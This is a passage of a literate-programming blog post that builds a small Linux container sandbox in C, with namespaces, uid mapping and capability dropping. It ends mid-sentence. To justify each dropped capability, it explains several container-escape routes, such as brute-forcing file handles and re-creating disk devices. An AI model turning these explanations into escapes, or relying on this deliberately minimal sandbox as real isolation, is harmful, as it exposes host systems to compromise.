Linux containers in 500 lines of code

I've used Linux containers directly and indirectly for years, but I wanted to become more familiar with them. So I wrote some code. This used to be 500 lines of code, I swear, but I've revised it some since publishing; I've ended up with about 70 lines more.

I wanted specifically to find a minimal set of restrictions to run untrusted code. This isn't how you should approach containers on anything with any exposure: you should restrict everything you can. But I think it's important to know which permissions are categorically unsafe! I've tried to back up things I'm saying with links to code or people I trust, but I'd love to know if I missed anything.

This is a noweb-style piece of literate code. References named <<x>> will be expanded to the code block named x. You can find the tangled source here. This document is an orgmode document; you can find its source here. This document and this code are licensed under the GPLv3; you can find its text here.

Container setup

There are several complementary and overlapping mechanisms that make up modern Linux containers. Roughly,

namespaces are used to group kernel objects into different sets that can be accessed by specific process trees. For example, pid namespaces limit the view of the process list to the processes within the namespace. There are a couple of different kinds of namespaces. I'll go into this more later.
capabilities are used here to set some coarse limits on what uid 0 can do.
cgroups is a mechanism to limit usage of resources like memory, disk io, and cpu-time.
setrlimit is another mechanism for limiting resource usage. It's older than cgroups, but can do some things cgroups can't.

These are all Linux kernel mechanisms. Seccomp, capabilities, and setrlimit are all done with system calls. cgroups is accessed through a filesystem.
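As a small illustration of the "done with system calls" side, here is a minimal sketch using setrlimit. The helper name lower_open_file_limit is hypothetical and not part of contained.c; it only ever lowers the soft RLIMIT_NOFILE limit, which an unprivileged process is allowed to do.

```c
#include <assert.h>
#include <sys/resource.h>

/* Hypothetical helper, not part of contained.c: lower the soft limit on
   open file descriptors to at most `wanted`. Returns 0 on success. */
int lower_open_file_limit(rlim_t wanted)
{
	struct rlimit lim;
	assert(wanted > 0);
	if (getrlimit(RLIMIT_NOFILE, &lim))
		return -1;
	/* Only ever lower the soft limit; if it is already at or below
	   `wanted` there is nothing to do. */
	if (wanted >= lim.rlim_cur)
		return 0;
	lim.rlim_cur = wanted;
	return setrlimit(RLIMIT_NOFILE, &lim);
}
```

Calling lower_open_file_limit(64) before exec'ing a program caps that program at 64 open descriptors unless it raises its own soft limit again, which is why a real sandbox would lower the hard limit (rlim_max) as well.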

There's a lot here, and the scope of each mechanism is pretty unclear. They overlap a lot and it's tricky to find the best way to limit things. User namespaces are somewhat new, and promise to unify a lot of this behavior. But unfortunately compiling the kernel with user namespaces enabled complicates things. Compiling with user namespaces changes the semantics of capabilities system-wide, which could cause more problems or at least confusion¹. There have been a large number of privilege-escalation bugs exposed by user namespaces. "Understanding and Hardening Linux Containers" explains:

Despite the large upsides the user namespace provides in terms of security, due to the sensitive nature of the user namespace, somewhat conflicting security models and large amount of new code, several serious vulnerabilities have been discovered and new vulnerabilities have unfortunately continued to be discovered. These deal with both the implementation of user namespaces itself or allow the illegitimate or unintended use of the user namespace to perform a privilege escalation. Often these issues present themselves on systems where containers are not being used, and where the kernel version is recent enough to support user namespaces.

It's turned off by default in Linux at the time of this writing², but many distributions apply patches to turn it on in a limited way³.

But all of these issues apply to hosts with user namespaces compiled in; it doesn't really matter whether we use user namespaces or not, especially since I'll be preventing nested user namespaces. So I'll use a user namespace only if one is available.

(The user-namespace handling in this code was originally pretty broken. Jann Horn in particular gave great feedback. Thanks!)

`contained.c`

This program can be used like this, to run /bin/sh from ~/misc/busybox-img as root:

[lizzie@empress l-c-i-500-l]$ sudo ./contained -m ~/misc/busybox-img/ -u 0 -c /bin/sh
=> validating Linux version...4.7.10.201610222037-1-grsec on x86_64.
=> setting cgroups...memory...cpu...pids...blkio...done.
=> setting rlimit...done.
=> remounting everything with MS_PRIVATE...remounted.
=> making a temp directory and a bind mount there...done.
=> pivoting root...done.
=> unmounting /oldroot.oQ5jOY...done.
=> trying a user namespace...writing /proc/32627/uid_map...writing /proc/32627/gid_map...done.
=> switching to uid 0 / gid 0...done.
=> dropping capabilities...bounding...inheritable...done.
=> filtering syscalls...done.
/ # whoami
root
/ # hostname
05fe5c-three-of-pentacles
/ # exit
=> cleaning cgroups...done.

So, a skeleton for it:

Listing 7: contained.c

/* -*- compile-command: "gcc -Wall -Werror -lcap -lseccomp contained.c -o contained" -*- */
/* This code is licensed under the GPLv3. You can find its text here:
   https://www.gnu.org/licenses/gpl-3.0.en.html */


#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <grp.h>
#include <pwd.h>
#include <sched.h>
#include <seccomp.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <unistd.h>
#include <sys/capability.h>
#include <sys/mount.h>
#include <sys/prctl.h>
#include <sys/resource.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/utsname.h>
#include <sys/wait.h>
#include <linux/capability.h>
#include <linux/limits.h>

struct child_config {
	int argc;
	uid_t uid;
	int fd;
	char *hostname;
	char **argv;
	char *mount_dir;
};

<<capabilities>>

<<mounts>>

<<syscalls>>

<<resources>>

<<child>>

<<choose-hostname>>

int main (int argc, char **argv)
{
	struct child_config config = {0};
	int err = 0;
	int option = 0;
	int sockets[2] = {0};
	pid_t child_pid = 0;
	int last_optind = 0;
	while ((option = getopt(argc, argv, "c:m:u:"))) {
		switch (option) {
		case 'c':
			config.argc = argc - last_optind - 1;
			config.argv = &argv[argc - config.argc];
			goto finish_options;
		case 'm':
			config.mount_dir = optarg;
			break;
		case 'u':
			if (sscanf(optarg, "%d", &config.uid) != 1) {
				fprintf(stderr, "badly-formatted uid: %s\n", optarg);
				goto usage;
			}
			break;
		default:
			goto usage;
		}
		last_optind = optind;
	}
finish_options:
	if (!config.argc) goto usage;
	if (!config.mount_dir) goto usage;

<<check-linux-version>>

	char hostname[256] = {0};
	if (choose_hostname(hostname, sizeof(hostname)))
		goto error;
	config.hostname = hostname;

<<namespaces>>

	goto cleanup;
usage:
	fprintf(stderr, "Usage: %s -u -1 -m . -c /bin/sh ~\n", argv[0]);
error:
	err = 1;
cleanup:
	if (sockets[0]) close(sockets[0]);
	if (sockets[1]) close(sockets[1]);
	return err;
}

Since I'll be blacklisting system calls and capabilities, it's important to make sure there aren't any new ones.

Listing 8: <<check-linux-version>> =

	fprintf(stderr, "=> validating Linux version...");
	struct utsname host = {0};
	if (uname(&host)) {
		fprintf(stderr, "failed: %m\n");
		goto error;
	}
	int major = -1;
	int minor = -1;
	/* major and minor are ints, so parse them with %d. */
	if (sscanf(host.release, "%d.%d.", &major, &minor) != 2) {
		fprintf(stderr, "weird release format: %s\n", host.release);
		goto error;
	}
	if (major != 4 || (minor != 7 && minor != 8)) {
		fprintf(stderr, "expected 4.7.x or 4.8.x: %s\n", host.release);
		goto error;
	}
	if (strcmp("x86_64", host.machine)) {
		fprintf(stderr, "expected x86_64: %s\n", host.machine);
		goto error;
	}
	/* Failures above go to error (not cleanup) so we exit non-zero. */
	fprintf(stderr, "%s on %s.\n", host.release, host.machine);

(This had a bug. captainjey on reddit let me know. Thanks!)
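The release check is easy to get subtly wrong, so here is a minimal sketch of the same test pulled out into a pure function that can be exercised without calling uname. The name release_is_supported is hypothetical and isn't part of contained.c.

```c
#include <assert.h>
#include <stdio.h>

/* Hypothetical helper mirroring the check above: returns 1 if `release`
   (as found in utsname.release) names a 4.7.x or 4.8.x kernel, else 0. */
int release_is_supported(const char *release)
{
	unsigned major = 0;
	unsigned minor = 0;
	assert(release);
	if (sscanf(release, "%u.%u.", &major, &minor) != 2)
		return 0;
	return major == 4 && (minor == 7 || minor == 8);
}
```

With this, release_is_supported("4.7.10.201610222037-1-grsec") is accepted, while "4.9.1" and "5.7.0" are both rejected: the major and minor numbers have to match together.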

And I wasn't quite at 500 lines of code, so I thought I had some space to build nice hostnames.

Listing 9: <<choose-hostname>> =

int choose_hostname(char *buff, size_t len)
{
	static const char *suits[] = { "swords", "wands", "pentacles", "cups" };
	static const char *minor[] = {
		"ace", "two", "three", "four", "five", "six", "seven", "eight",
		"nine", "ten", "page", "knight", "queen", "king"
	};
	static const char *major[] = {
		"fool", "magician", "high-priestess", "empress", "emperor",
		"hierophant", "lovers", "chariot", "strength", "hermit",
		"wheel", "justice", "hanged-man", "death", "temperance",
		"devil", "tower", "star", "moon", "sun", "judgment", "world"
	};
	struct timespec now = {0};
	clock_gettime(CLOCK_MONOTONIC, &now);
	size_t ix = now.tv_nsec % 78;
	if (ix < sizeof(major) / sizeof(*major)) {
		snprintf(buff, len, "%05lx-%s", now.tv_sec, major[ix]);
	} else {
		ix -= sizeof(major) / sizeof(*major);
		snprintf(buff, len,
			 "%05lxc-%s-of-%s",
			 now.tv_sec,
			 minor[ix % (sizeof(minor) / sizeof(*minor))],
			 suits[ix / (sizeof(minor) / sizeof(*minor))]);
	}
	return 0;
}
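The index arithmetic is the only subtle part of choose_hostname: indexes 0 through 21 pick a major arcana card, and the remaining 56 are split into four suits of 14. Here's a minimal sketch of just that mapping, with the clock and the hex prefix left out. The function name card_name is hypothetical.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/* Same tables as choose_hostname above. */
static const char *card_suits[] = { "swords", "wands", "pentacles", "cups" };
static const char *card_minor[] = {
	"ace", "two", "three", "four", "five", "six", "seven", "eight",
	"nine", "ten", "page", "knight", "queen", "king"
};
static const char *card_major[] = {
	"fool", "magician", "high-priestess", "empress", "emperor",
	"hierophant", "lovers", "chariot", "strength", "hermit",
	"wheel", "justice", "hanged-man", "death", "temperance",
	"devil", "tower", "star", "moon", "sun", "judgment", "world"
};

/* Hypothetical helper: write the card for index ix (0..77) into buff.
   Returns 0 on success, -1 if ix is out of range. */
int card_name(size_t ix, char *buff, size_t len)
{
	size_t n_major = sizeof(card_major) / sizeof(*card_major);
	size_t n_minor = sizeof(card_minor) / sizeof(*card_minor);
	assert(buff && len);
	if (ix >= 78)
		return -1;
	if (ix < n_major) {
		snprintf(buff, len, "%s", card_major[ix]);
	} else {
		ix -= n_major;
		snprintf(buff, len, "%s-of-%s",
			 card_minor[ix % n_minor], card_suits[ix / n_minor]);
	}
	return 0;
}
```

For example, index 52 is past the 22 major cards, leaving 30; 30 % 14 is 2 ("three") and 30 / 14 is 2 ("pentacles"), which is the card in the session shown earlier.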

Namespaces

clone is the system call behind fork() et al. It's also the key to all of this. Conceptually we want to create a process with different properties than its parent: it should be able to mount a different /, set its own hostname, and do other things. We'll specify all of this by passing flags to clone ⁴.

The child needs to send some messages to the parent, so we'll initialize a socketpair, and then make sure the child only receives access to one.

Listing 10: <<namespaces>> +=

	if (socketpair(AF_LOCAL, SOCK_SEQPACKET, 0, sockets)) {
		fprintf(stderr, "socketpair failed: %m\n");
		goto error;
	}
	if (fcntl(sockets[0], F_SETFD, FD_CLOEXEC)) {
		fprintf(stderr, "fcntl failed: %m\n");
		goto error;
	}
	config.fd = sockets[1];

But first we need to set up room for a stack. We'll execve later, which will actually set up the stack again, so this is only temporary.⁵

Listing 13: <<namespaces>> +=

	#define STACK_SIZE (1024 * 1024)

	char *stack = 0;
	if (!(stack = malloc(STACK_SIZE))) {
		fprintf(stderr, "=> malloc failed, out of memory?\n");
		goto error;
	}

We'll also prepare the cgroup for this process tree. More on this later.

Listing 14: <<namespaces>> +=

	if (resources(&config)) {
		err = 1;
		goto clear_resources;
	}

We'll namespace the mounts, cgroups, pids, IPC data structures, network devices, and hostname / domain name. I'll go into these more in the code for capabilities, cgroups, and syscalls.

Listing 15: <<namespaces>> +=

	int flags = CLONE_NEWNS
		| CLONE_NEWCGROUP
		| CLONE_NEWPID
		| CLONE_NEWIPC
		| CLONE_NEWNET
		| CLONE_NEWUTS;

Stacks on x86, and almost everything else Linux runs on, grow downwards, so we'll add STACK_SIZE to get a pointer just below the end.⁶ We also | the flags with SIGCHLD so that we can wait on it.

Listing 16: <<namespaces>> +=

	if ((child_pid = clone(child, stack + STACK_SIZE, flags | SIGCHLD, &config)) == -1) {
		fprintf(stderr, "=> clone failed! %m\n");
		err = 1;
		goto clear_resources;
	}
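To see the stack handling and SIGCHLD in isolation, here is a minimal sketch that calls clone with no namespace flags at all, so it needs no privileges. The names run_in_clone, demo_child and DEMO_STACK_SIZE are hypothetical; the waitpid call is an assumption about how a parent would typically collect the child, not a copy of contained.c.

```c
#define _GNU_SOURCE
#include <assert.h>
#include <sched.h>
#include <signal.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>

#define DEMO_STACK_SIZE (1024 * 1024)

/* Runs in the cloned child; its return value becomes the exit status. */
static int demo_child(void *arg)
{
	return *(int *) arg;
}

/* Hypothetical demo: clone a child on a malloc'd stack, wait for it,
   and return its exit status, or -1 on failure. */
int run_in_clone(int status)
{
	char *stack = NULL;
	int wstatus = 0;
	pid_t pid;
	assert(status >= 0 && status <= 255);
	if (!(stack = malloc(DEMO_STACK_SIZE)))
		return -1;
	/* The stack grows down, so pass the address just past the end.
	   SIGCHLD is what lets waitpid() see the child exit. */
	pid = clone(demo_child, stack + DEMO_STACK_SIZE, SIGCHLD, &status);
	if (pid == -1) {
		free(stack);
		return -1;
	}
	if (waitpid(pid, &wstatus, 0) != pid) {
		free(stack);
		return -1;
	}
	free(stack);
	return WIFEXITED(wstatus) ? WEXITSTATUS(wstatus) : -1;
}
```

Because CLONE_VM isn't passed, the child runs on its own copy of the address space, so the parent can free the stack as soon as the child has been reaped.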

Close and zero the child's socket, so that if something breaks then we don't leave an open fd, possibly causing the child or the parent to hang.

Listing 17: <<namespaces>> +=

	close(sockets[1]);
	sockets[1] = 0;

The parent process will configure the child's user namespace and then pause until the child process tree exits⁷.

Listing 21: <<child>> +=

#define USERNS_OFFSET 10000
#define USERNS_COUNT 2000

int handle_child_uid_map (pid_t child_pid, int fd)
{
	int uid_map = 0;
	int has_userns = -1;
	if (read(fd, &has_userns, sizeof(has_userns)) != sizeof(has_userns)) {
		fprintf(stderr, "couldn't read from child!\n");
		return -1;
	}
	if (has_userns) {
		char path[PATH_MAX] = {0};
		for (char **file = (char *[]) { "uid_map", "gid_map", 0 }; *file; file++) {
			if (snprintf(path, sizeof(path), "/proc/%d/%s", child_pid, *file)
			    >= sizeof(path)) {
				fprintf(stderr, "snprintf too big? %m\n");
				return -1;
			}
			fprintf(stderr, "writing %s...", path);
			if ((uid_map = open(path, O_WRONLY)) == -1) {
				fprintf(stderr, "open failed: %m\n");
				return -1;
			}
			if (dprintf(uid_map, "0 %d %d\n", USERNS_OFFSET, USERNS_COUNT) == -1) {
				fprintf(stderr, "dprintf failed: %m\n");
				close(uid_map);
				return -1;
			}
			close(uid_map);
		}
	}
	if (write(fd, & (int) { 0 }, sizeof(int)) != sizeof(int)) {
		fprintf(stderr, "couldn't write: %m\n");
		return -1;
	}
	return 0;
}
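The line written to uid_map and gid_map has the form "first id inside, first id outside, count", as described in user_namespaces(7). Here's a minimal sketch of what the mapping above means in practice; format_id_map and host_id_for are hypothetical helpers, not part of contained.c.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

#define USERNS_OFFSET 10000
#define USERNS_COUNT 2000

/* Format the single mapping line written to uid_map and gid_map above:
   "<first id inside> <first id outside> <count>". Returns 0 on success. */
int format_id_map(char *buff, size_t len)
{
	int n;
	assert(buff && len);
	n = snprintf(buff, len, "0 %d %d\n", USERNS_OFFSET, USERNS_COUNT);
	return (n < 0 || (size_t) n >= len) ? -1 : 0;
}

/* Translate an id as seen inside the namespace to the id the host sees,
   or -1 if the id falls outside the mapped range. */
long host_id_for(long inner_id)
{
	if (inner_id < 0 || inner_id >= USERNS_COUNT)
		return -1;
	return USERNS_OFFSET + inner_id;
}
```

So uid 0 in the container is uid 10000 on the host, uid 1999 is 11999, and uid 2000 has no mapping at all.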

The child process will send a message to the parent process about whether it should set uid and gid mappings. If that works, it will setgroups, setresgid, and setresuid. Both setgroups and setresgid are necessary here since there are two separate group mechanisms on Linux⁹. I'm also assuming here that every uid has a corresponding gid, which is common but not necessarily universal.

Listing 23: <<child>> +=

int userns(struct child_config *config)
{
	fprintf(stderr, "=> trying a user namespace...");
	int has_userns = !unshare(CLONE_NEWUSER);
	if (write(config->fd, &has_userns, sizeof(has_userns)) != sizeof(has_userns)) {
		fprintf(stderr, "couldn't write: %m\n");
		return -1;
	}
	int result = 0;
	if (read(config->fd, &result, sizeof(result)) != sizeof(result)) {
		fprintf(stderr, "couldn't read: %m\n");
		return -1;
	}
	if (result) return -1;
	if (has_userns) {
		fprintf(stderr, "done.\n");
	} else {
		fprintf(stderr, "unsupported? continuing.\n");
	}
	fprintf(stderr, "=> switching to uid %d / gid %d...", config->uid, config->uid);
	if (setgroups(1, & (gid_t) { config->uid }) ||
	    setresgid(config->uid, config->uid, config->uid) ||
	    setresuid(config->uid, config->uid, config->uid)) {
		fprintf(stderr, "%m\n");
		return -1;
	}
	fprintf(stderr, "done.\n");
	return 0;
}
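The two functions above form a small request and reply protocol over the socketpair. Here's a minimal sketch of just that handshake, with the namespace and uid work left out and plain fork standing in for clone. The name handshake_demo and the exit codes are hypothetical.

```c
#include <assert.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Hypothetical demo: the child reports `has_userns`, the parent replies
   with `verdict` (0 meaning "mappings written"), and the child exits 0
   only if the verdict was 0. Returns the child's exit status, or -1. */
int handshake_demo(int has_userns, int verdict)
{
	int sockets[2] = {0};
	int seen = -1;
	int wstatus = 0;
	pid_t pid;
	assert(has_userns == 0 || has_userns == 1);
	if (socketpair(AF_LOCAL, SOCK_SEQPACKET, 0, sockets))
		return -1;
	if ((pid = fork()) == -1) {
		close(sockets[0]);
		close(sockets[1]);
		return -1;
	}
	if (pid == 0) {
		/* Child side, like userns(): announce, then block on the reply. */
		int result = -1;
		close(sockets[0]);
		if (write(sockets[1], &has_userns, sizeof(has_userns)) != sizeof(has_userns)
		    || read(sockets[1], &result, sizeof(result)) != sizeof(result))
			_exit(2);
		_exit(result ? 1 : 0);
	}
	/* Parent side, like handle_child_uid_map(): read, act, reply. */
	close(sockets[1]);
	if (read(sockets[0], &seen, sizeof(seen)) != sizeof(seen)
	    || seen != has_userns
	    || write(sockets[0], &verdict, sizeof(verdict)) != sizeof(verdict)) {
		close(sockets[0]);
		waitpid(pid, NULL, 0);
		return -1;
	}
	close(sockets[0]);
	if (waitpid(pid, &wstatus, 0) != pid)
		return -1;
	return WIFEXITED(wstatus) ? WEXITSTATUS(wstatus) : -1;
}
```

Each side closes the end it doesn't use. That is what lets a read return early instead of hanging if the other process dies mid-handshake.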

And this is where the child process from clone will end up. We'll perform all of our setup, switch users and groups, and then load the executable. The order is important here: we can't change mounts without certain capabilities, we can't unshare after we limit the syscalls, etc.

Listing 24: <<child>> +=

int child(void *arg)
{
	struct child_config *config = arg;
	if (sethostname(config->hostname, strlen(config->hostname))
	    || mounts(config)
	    || userns(config)
	    || capabilities()
	    || syscalls()) {
		close(config->fd);
		return -1;
	}
	if (close(config->fd)) {
		fprintf(stderr, "close failed: %m\n");
		return -1;
	}
	if (execve(config->argv[0], config->argv, NULL)) {
		fprintf(stderr, "execve failed! %m.\n");
		return -1;
	}
	return 0;
}

Capabilities

Capabilities subdivide the property of "being root" on Linux. It's useful to compartmentalize privileges so that, for example, a process can allocate network devices (CAP_NET_ADMIN) but not read all files (CAP_DAC_OVERRIDE). I'll use them here to drop the ones we don't want.

But not all of "being root" is subdivided into capabilities. For example, writing to parts of procfs is allowed by root even after having dropped capabilities¹⁰. There are a lot of things like this: this is part of why we need other restrictions besides capabilities.

It's also important to think about how we're dropping capabilities. man 7 capabilities has an algorithm for us:

	During  an   execve(2),  the   kernel  calculates   the  new
	capabilities of the process using the following algorithm:

	    P'(ambient) = (file is privileged) ? 0 : P(ambient)

	    P'(permitted) = (P(inheritable) & F(inheritable)) |
					(F(permitted) & cap_bset) | P'(ambient)

	    P'(effective) = F(effective) ? P'(permitted) : P'(ambient)

	    P'(inheritable) = P(inheritable)    [i.e., unchanged]

	where:

	    P         denotes the  value of a thread  capability set
			    before the execve(2)

	    P'        denotes the  value of a thread  capability set
			    after the execve(2)

	    F         denotes a file capability set

	    cap_bset  is the  value of  the capability  bounding set
			    (described below).

We'd like P'(ambient) and P(inheritable) to be empty, and P'(permitted) and P'(effective) to only include the capabilities we're keeping. This is achievable by doing the following:

Clearing our own inheritable set. This clears the ambient set; man 7 capabilities says "The ambient capability set obeys the invariant that no capability can ever be ambient if it is not both permitted and inheritable." This also clears the child's inheritable set.
Clearing the bounding set. This limits the file capabilities we'll gain when we execve, and the rest are limited by clearing the inheritable and ambient sets.

If we were to only drop our own effective, permitted and inheritable sets, we'd regain the permissions in the child file's capabilities. This is how bash can call ping, for example.¹¹
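The algorithm quoted from the man page is just bit arithmetic, so it can be modelled directly. This is a minimal sketch with hypothetical names (cap_sets, file_caps, caps_after_execve); it treats each set as a 64-bit mask and ignores the special handling of uid 0 that the man page describes separately.

```c
#include <assert.h>
#include <stdint.h>

/* Thread capability sets, one bit per capability. */
struct cap_sets {
	uint64_t permitted, inheritable, effective, ambient;
};

/* File capability sets; `effective` is a single flag on files, and
   `privileged` means the file is setuid/setgid or has capabilities. */
struct file_caps {
	uint64_t permitted, inheritable;
	int effective;
	int privileged;
};

/* Apply the execve(2) rules quoted above to plain bitmasks. */
struct cap_sets caps_after_execve(struct cap_sets p, struct file_caps f,
				  uint64_t cap_bset)
{
	struct cap_sets next;
	assert(f.effective == 0 || f.effective == 1);
	next.ambient = f.privileged ? 0 : p.ambient;
	next.permitted = (p.inheritable & f.inheritable)
		| (f.permitted & cap_bset)
		| next.ambient;
	next.effective = f.effective ? next.permitted : next.ambient;
	next.inheritable = p.inheritable;
	return next;
}
```

Feeding it a process with every set empty and a file whose permitted set holds CAP_NET_RAW shows the ping case: with a full bounding set the capability comes back, and with that bit removed from the bounding set it doesn't.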

Dropped capabilities

Listing 29: <<capabilities>> +=

int capabilities()
{
	fprintf(stderr, "=> dropping capabilities...");

CAP_AUDIT_CONTROL, _READ, and _WRITE allow access to the audit system of the kernel (i.e. functions like audit_set_enabled, usually used with auditctl). The kernel prevents messages that normally require CAP_AUDIT_CONTROL outside of the first pid namespace, but it does allow messages that would require CAP_AUDIT_READ and CAP_AUDIT_WRITE from any namespace.¹² So let's drop them all. We especially want to drop CAP_AUDIT_READ, since it isn't namespaced¹³ and may contain important information, but CAP_AUDIT_WRITE may also allow the contained process to falsify logs or DOS the audit system.

Listing 32: <<capabilities>> +=

	int drop_caps[] = {
		CAP_AUDIT_CONTROL,
		CAP_AUDIT_READ,
		CAP_AUDIT_WRITE,

CAP_BLOCK_SUSPEND lets programs prevent the system from suspending, either with EPOLLWAKEUP or /proc/sys/wake_lock.¹⁴ Suspend isn't namespaced, so we'd like to prevent this.

Listing 34: <<capabilities>> +=

		CAP_BLOCK_SUSPEND,

CAP_DAC_READ_SEARCH lets programs call open_by_handle_at with an arbitrary struct file_handle *. struct file_handle is in theory an opaque type, but in practice it corresponds to inode numbers. So it's easy to brute-force them, and read arbitrary files. This was used by Sebastian Krahmer to write a program to read arbitrary system files from within Docker in 2014.¹⁵

Listing 36: <<capabilities>> +=

		CAP_DAC_READ_SEARCH,

CAP_FSETID, without user namespacing, allows the process to modify a setuid executable without removing the setuid bit. This is pretty dangerous! It means that if we include a setuid binary in a container, it's easy for us to accidentally leave a dangerous setuid root binary on our disk, which any user can use to escalate privileges.¹⁶

Listing 40: <<capabilities>> +=

		CAP_FSETID,

CAP_IPC_LOCK can be used to lock more of a process' own memory than would normally be allowed¹⁷, which could be a way to deny service.

Listing 43: <<capabilities>> +=

		CAP_IPC_LOCK,

CAP_MAC_ADMIN and CAP_MAC_OVERRIDE are used by the mandatory access control systems AppArmor, SELinux, and SMACK to restrict access to their settings. These aren't namespaced, so they could be used by the contained programs to circumvent system-wide access control.

Listing 44: <<capabilities>> +=

		CAP_MAC_ADMIN,
		CAP_MAC_OVERRIDE,

CAP_MKNOD, without user namespacing, allows programs to create device files corresponding to real-world devices. This includes creating new device files for existing hardware. If this capability were not dropped, a contained process could re-create the hard disk device, remount it, and read or write to it.¹⁸

Listing 47: <<capabilities>> +=

		CAP_MKNOD,

I was worried that CAP_SETFCAP could be used to add a capability to an executable and execve it, but it's not actually possible for a process to set capabilities it doesn't have¹⁹. But! An executable altered this way could be executed by any unsandboxed user, so I think it unacceptably undermines the security of the system.

Listing 51: <<capabilities>> +=

		CAP_SETFCAP,

CAP_SYSLOG lets users perform destructive actions against the syslog. Importantly, dropping it doesn't prevent contained processes from reading the syslog, which could be risky. Holding it also exposes kernel addresses, which could be used to circumvent kernel address space layout randomization²⁰.

Listing 54: <<capabilities>> +=

		CAP_SYSLOG,

CAP_SYS_ADMIN allows many behaviors! We don't want most of them (mount, vm86, etc). Some would be nice to have (sethostname, mount for bind mounts…) but the extra complexity doesn't seem worth it.

Listing 55: <<capabilities>> +=

		CAP_SYS_ADMIN,

CAP_SYS_BOOT allows programs to restart the system (the reboot syscall) and load new kernels (the kexec_load and kexec_file_load syscalls)²¹. We absolutely don't want this. reboot is user-namespaced, and the kexec* functions only work in the root user namespace, but neither of those helps us.

Listing 59: <<capabilities>> +=

		CAP_SYS_BOOT,

CAP_SYS_MODULE is used by the syscalls delete_module, init_module, finit_module ²², by the code for kmod ²³, and by the code for loading device modules with ioctl²⁴.

Listing 66: <<capabilities>> +=

		CAP_SYS_MODULE,

CAP_SYS_NICE allows processes to set higher priority on given pids than the default²⁵. The default kernel scheduler doesn't know anything about pid namespaces, so it's possible for a contained process to deny service to the rest of the system²⁶.

Listing 71: <<capabilities>> +=

		CAP_SYS_NICE,

CAP_SYS_RAWIO allows full access to the host system's memory with /proc/kcore, /dev/mem, and /dev/kmem ²⁷, but a contained process would need mknod to access these within the namespace²⁸. But it also allows things like iopl and ioperm, which give raw access to the IO ports²⁹.

Listing 76: <<capabilities>> +=

		CAP_SYS_RAWIO,

CAP_SYS_RESOURCE specifically allows circumventing kernel-wide limits, so we probably should drop it³⁰. But I don't think this can do more than DOS the kernel, in general³¹.

Listing 78: <<capabilities>> +=

		CAP_SYS_RESOURCE,

CAP_SYS_TIME: setting the time isn't namespaced, so we should prevent contained processes from altering the system-wide time³².

Listing 79: <<capabilities>> +=

		CAP_SYS_TIME,

CAP_WAKE_ALARM, like CAP_BLOCK_SUSPEND, lets the contained process interfere with suspend³³, and we'd like to prevent that.

Listing 81: <<capabilities>> +=

		CAP_WAKE_ALARM
	};

Listing 82: <<capabilities>> +=

	size_t num_caps = sizeof(drop_caps) / sizeof(*drop_caps);
	fprintf(stderr, "bounding...");
	for (size_t i = 0; i < num_caps; i++) {
		if (prctl(PR_CAPBSET_DROP, drop_caps[i], 0, 0, 0)) {
			fprintf(stderr, "prctl failed: %m\n");
			return 1;
		}
	}
	fprintf(stderr, "inheritable...");
	cap_t caps = NULL;
	if (!(caps = cap_get_proc())
	    || cap_set_flag(caps, CAP_INHERITABLE, num_caps, drop_caps, CAP_CLEAR)
	    || cap_set_proc(caps)) {
		fprintf(stderr, "failed: %m\n");
		if (caps) cap_free(caps);
		return 1;
	}
	cap_free(caps);
	fprintf(stderr, "done.\n");
	return 0;
}
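One way to check the result is to ask the kernel which capabilities are still in the bounding set. This is a minimal sketch using prctl(PR_CAPBSET_READ), which needs neither libcap nor privileges; the helper names are hypothetical and not part of contained.c.

```c
#include <assert.h>
#include <stddef.h>
#include <sys/prctl.h>
#include <linux/capability.h>

/* Returns 1 if `cap` is still in the calling thread's bounding set, 0 if
   it has been dropped, and -1 if the kernel rejects the capability. */
int cap_in_bounding_set(int cap)
{
	return prctl(PR_CAPBSET_READ, cap, 0, 0, 0);
}

/* Count how many of `caps` are still in the bounding set, or return -1
   on error. Run after the dropping code above, this would be expected
   to report 0 for the drop_caps array. */
int count_still_bounded(const int *caps, size_t n)
{
	int count = 0;
	assert(caps || n == 0);
	for (size_t i = 0; i < n; i++) {
		int r = cap_in_bounding_set(caps[i]);
		if (r == -1)
			return -1;
		count += r;
	}
	return count;
}
```

In an ordinary root shell, cap_in_bounding_set(CAP_SYS_ADMIN) would normally report 1; inside the container, after capabilities() has run, it should report 0.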

Retained Capabilities

It's important to keep track of the capabilities I'm not dropping, too.

I've heard in multiple places³⁴ that CAP_DAC_OVERRIDE might expose the same functionality as CAP_DAC_READ_SEARCH (i.e. open_by_handle_at), but as far as I can tell that isn't true. shocker.c doesn't get anywhere with only CAP_DAC_OVERRIDE ³⁵, and the only usage in the kernel is in the Unix permission-checking code³⁶. So my understanding is that CAP_DAC_OVERRIDE on its own doesn't allow processes to read outside of their mount namespaces ("DAC" or "Discretionary Access Control" refers here to ordinary unix permissions).

CAP_FOWNER, CAP_LEASE, and CAP_LINUX_IMMUTABLE all operate on files inside of the mount namespace.

Likewise, CAP_SYS_PACCT allows processes to switch accounting on and off for themselves. The acct system call takes a path to log to (which must be within the mount namespace), and only operates on the calling process. We're not using process accounting in our containerization, so turning it off should be harmless as well.³⁷

CAP_IPC_OWNER is only used by functions that respect IPC namespaces³⁸; since we're in a separate IPC namespace from the host, we can allow this.

CAP_NET_ADMIN lets processes create network devices; CAP_NET_BIND_SERVICE lets processes bind to low ports on those devices; CAP_NET_RAW lets processes send raw packets on those devices. Since we're going to isolate the networking with a virtual bridge, and the contained process is inside of a network namespace, these shouldn't be an issue³⁹. I was wondering whether we could recreate an existing device like mknod does, but I don't think it's possible ⁴⁰.

CAP_SYS_PTRACE doesn't allow ptrace across pid namespaces⁴¹. CAP_KILL doesn't allow signals across pid namespaces⁴².

CAP_SETUID and CAP_SETGID have similar behaviors⁴³:

Make arbitrary manipulations of process UIDs and GIDs and supplementary GID list: this will only apply to pids in the namespace.
Forge UID (GID) when passing socket credentials via UNIX domain sockets: the mount namespace should prevent us from reading the host system's unix domain sockets.
Write a user (group) ID mapping in a user namespace (see user_namespaces(7)): this is /proc/self/uid_map, which will be hidden inside the container.

CAP_SETPCAP only lets processes add or drop capabilities they already effectively have; man 7 capabilities says

